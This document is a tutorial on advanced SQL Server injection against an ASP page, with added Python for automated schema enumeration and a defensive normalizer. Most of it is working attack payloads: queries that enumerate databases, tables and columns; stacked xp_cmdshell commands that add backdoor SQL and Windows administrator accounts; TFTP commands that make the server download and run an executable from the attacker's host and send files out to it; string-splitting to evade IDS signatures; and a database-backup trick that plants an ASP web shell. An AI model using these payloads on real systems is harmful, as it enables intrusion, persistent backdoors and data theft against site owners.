SQL Server injection: advanced techniques
The author sets out here the advanced SQL Server injection techniques gathered over years of working with SQL Server, for the benefit of friends of this site.
This article covers only the advanced techniques; the basic injection methods are not explained in detail.
Readers who cannot follow the injection steps below should first read this site's basic article.
To make better use of injection, we also suggest looking at this site's articles on SQL grammar.
[Get all database names]
select name from master.dbo.sysdatabases where dbid>6
dbid values 1 to 6 are taken by the databases that come with the installation (master, tempdb, model, msdb and, on SQL Server 2000, pubs and Northwind); from 7 upward they are user databases, so dbid>6 lists exactly the user databases.
[Get data table names] (write the table name into a field the page displays with an update, then read that field back to get the name)
select top 1 name from dbname.dbo.sysobjects where xtype='U' and status>0 and name not in ('table')
xtype='U' restricts the result to user tables and status>0 excludes system tables; repeat the query, each time adding the names already recovered to the not in (...) list, until it returns nothing.
[Get data table field names] (write the field name into a displayed field with an update, then read it back)
select top 1 dbname.dbo.col_name(object_id('table name to query'), 1) [where condition]
col_name takes the object id of the table and a 1-based column ordinal; step the ordinal 1, 2, 3, ... until col_name returns NULL, which means the last column has been passed.
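The two enumeration queries above are normally repeated by hand, one name per request. The script below is an added example and not part of the original article: it automates that walk by generating the sysobjects and col_name queries, doubling any single quote inside a recovered name, and feeding each result back into the not in (...) list. The FakeTarget class and SAMPLE_TABLES are constructed here so the script runs offline; in a real test the execute callable would be the HTTP request that injects the query and reads the updated field back. The example qualifies the table inside object_id() as 'db.dbo.table' rather than prefixing col_name with the database name as the article does; both name the same table.

```python
import re

def quote(value):
    """Render a T-SQL string literal, doubling any embedded single quote."""
    return "'" + value.replace("'", "''") + "'"

def next_table_sql(db, known):
    """Query for the next user table in `db` that is not yet in `known`.
    T-SQL rejects an empty IN list, so '' is used as a placeholder."""
    excluded = ", ".join(quote(t) for t in known) or "''"
    return (f"select top 1 name from {db}.dbo.sysobjects "
            f"where xtype='U' and status>0 and name not in ({excluded})")

def column_sql(db, table, ordinal):
    """Query for the column at 1-based position `ordinal` of db.dbo.table.
    object_id() accepts a multi-part name, so the database is given there."""
    return f"select top 1 col_name(object_id({quote(f'{db}.dbo.{table}')}), {ordinal})"

def enumerate_schema(execute, db, max_tables=200):
    """Walk every table and its columns through `execute(sql) -> str | None`,
    which must return the single value the injected query produced."""
    schema = {}
    known = []
    while len(known) < max_tables:
        table = execute(next_table_sql(db, known))
        if table is None:
            break
        known.append(table)
        columns = []
        ordinal = 1
        while True:
            column = execute(column_sql(db, table, ordinal))
            if column is None:          # col_name() returns NULL past the last column
                break
            columns.append(column)
            ordinal += 1
        schema[table] = columns
    return schema

LITERAL = re.compile(r"'((?:[^']|'')*)'")

class FakeTarget:
    """Constructed stand-in for the injectable page so the walker runs offline.
    It answers only the two query shapes emitted above; a real engagement
    replaces execute() with the request that injects and reads back."""
    def __init__(self, tables):
        self.tables = tables            # {table name: [column names in order]}

    def execute(self, sql):
        m = re.search(r"name not in \((.*)\)$", sql)
        if m:
            excluded = {lit.replace("''", "'") for lit in LITERAL.findall(m.group(1))}
            return next((t for t in self.tables if t not in excluded), None)
        m = re.search(r"object_id\('((?:[^']|'')*)'\), (\d+)\)$", sql)
        if m:
            table = m.group(1).split(".dbo.", 1)[1].replace("''", "'")
            columns = self.tables.get(table, [])
            index = int(m.group(2)) - 1
            return columns[index] if index < len(columns) else None
        raise ValueError("unexpected query: " + sql)

# Constructed sample schema for the offline run.
SAMPLE_TABLES = {
    "admin": ["id", "username", "password"],
    "news": ["id", "title", "body"],
}

if __name__ == "__main__":
    print(enumerate_schema(FakeTarget(SAMPLE_TABLES).execute, "webdb"))
```

Each recovered name costs one request for the update and one for the read-back, so the number of round trips is roughly twice the number of tables plus columns; the max_tables bound keeps a misbehaving target from looping forever.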
[Create a database administrator account and a system administrator account through the SQL Server injection vulnerability] (the login the web application connects with must be a member of the sysadmin role)
News.asp?id=2;exec master.dbo.sp_addlogin test,test;--   add database login test with password test
News.asp?id=2;exec master.dbo.sp_password test,123456,test;--   to change the password, use this one (arguments are old password, new password, login: changes the password of test to 123456)
News.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;--   add test to the sysadmin role; its members can perform any action on the server
News.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';--   add Windows user test with password test
News.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';--   promote Windows user test to local Administrator
At this point you have left a sysadmin login named test in his SQL Server and an administrator account named test on his operating system.
xp_cmdshell runs the command under the account the SQL Server service itself runs as, so the two net commands succeed only when that service account has local administrator rights; on SQL Server 2005 and later xp_cmdshell is also disabled by default and must be enabled through sp_configure first.
[Upload and run a file through TFTP] (you must make your own machine a TFTP server and open UDP port 69; -i selects binary transfer mode)
Make the server download file.exe from your machine:
id=2;exec master.dbo.xp_cmdshell 'tftp -i yourIP get file.exe';--
Then run the file:
id=2;exec master.dbo.xp_cmdshell 'file.exe';--
Download the server's file File2.doc to your local TFTP server (the file must exist):
id=2;exec master.dbo.xp_cmdshell 'tftp -i yourIP put File2.doc';--
Both transfers are initiated by the server, so they work through firewalls that block inbound connections but allow outbound UDP; they fail when the Windows TFTP client is not installed (it is an optional feature from Windows Vista onward) or when outbound UDP is filtered.
[Bypass IDS detection] (build the procedure name from pieces in a variable, so the string xp_cmdshell never appears literally in the request)
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
T-SQL lets exec take the procedure name from a variable, so the concatenation is evaluated on the server and only the assembled name reaches the engine. Signature rules that look for the literal string xp_cmdshell miss both forms.
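A detection counterpart to the two payloads above, added here and not part of the original article: a normalizer that folds adjacent string literals and resolves exec @variable back to the literal assigned to that variable earlier in the batch, so both evasion forms reduce to a plain xp_cmdshell before a denylist is applied. The DANGEROUS list, the SAMPLES and the percent-encoded variant are chosen for this example; the input is assumed to be the value of the injected parameter as it appears in the request.

```python
import re
from urllib.parse import unquote

# Procedures and statements that almost never belong in a web request.
DANGEROUS = (
    "xp_cmdshell", "sp_addlogin", "sp_password", "sp_addsrvrolemember",
    "xp_regwrite", "sp_oacreate", "backup database",
)

STRING = r"'((?:[^']|'')*)'"                        # one T-SQL string literal
CONCAT = re.compile(STRING + r"\s*\+\s*" + STRING)   # 'a' + 'b'
ASSIGN = re.compile(r"\bset\s+(@\w+)\s*=\s*" + STRING, re.I)
EXEC_VAR = re.compile(r"\bexec(?:ute)?\s+(@\w+)", re.I)

def fold_concats(sql):
    """Join adjacent literals until nothing changes: 'xp'+'_cm'+'dshell' -> 'xp_cmdshell'."""
    previous = None
    while previous != sql:
        previous = sql
        sql = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", sql)
    return sql

def resolve_exec_variables(sql):
    """Replace EXEC @var with the literal that SET @var = '...' assigned to it."""
    assigned = {m.group(1).lower(): m.group(2) for m in ASSIGN.finditer(sql)}
    return EXEC_VAR.sub(
        lambda m: "exec " + assigned.get(m.group(1).lower(), m.group(1)), sql)

def normalize(raw):
    """Percent-decode, collapse whitespace, fold concatenations, resolve variables."""
    sql = unquote(raw)                  # %27 -> ', %2B -> + as sent in a query string
    sql = re.sub(r"\s+", " ", sql)      # so multi-word names such as backup database match
    sql = fold_concats(sql)
    sql = resolve_exec_variables(sql)
    return sql.lower()

def find_dangerous(raw):
    """Return the sorted dangerous names present after normalization."""
    normalized = normalize(raw)
    return sorted(name for name in DANGEROUS if name in normalized)

# Constructed sample parameter values: the two evasion payloads from the article,
# a percent-encoded form of the first, a stacked sp_addlogin call and two benign values.
SAMPLES = [
    "2;declare @a sysname set @a='xp_'+'Cmdshell' exec @a 'dir c:\\'",
    "2;declare @a sysname set @a='xp'+'_cm'+'Dshell' exec @a 'dir c:\\'",
    "2;declare%20@a%20sysname%20set%20@a%3D%27xp_%27%2B%27cmdshell%27%20exec%20@a%20%27dir%27",
    "2;exec master.dbo.sp_addlogin test,test;--",
    "2",
    "select name from news where id=2",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(find_dangerous(sample), sample)
```

This closes only the two tricks the article shows. Names built with char() or from hex literals, exec() of dynamic SQL, comments inserted inside identifiers and double encoding all slip past it, so a normalizer like this is a complement to, not a replacement for, removing the application's ability to call xp_cmdshell at all.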
[New addition: write a web shell with a database backup]
Create a table with a single column of type image, insert the ASP content into it, then export the database as a file under the web root:
backup database dbname to disk='d:\web\db.asp';
The backup file is mostly binary, but the ASP code is stored in it unchanged, and the ASP engine executes only what sits between <% and %> and passes the surrounding bytes through, so requesting db.asp runs the shell. This requires knowing the physical path of the web root and the SQL Server service account having write permission there.
[Get the operating system and database version from an error message]
id=2 and 1<>(select @@VERSION);
@@VERSION is an nvarchar string; comparing it with the integer 1 forces a type conversion that fails, and the error message the page returns quotes the whole value, which contains the SQL Server version and build and the Windows version it runs on.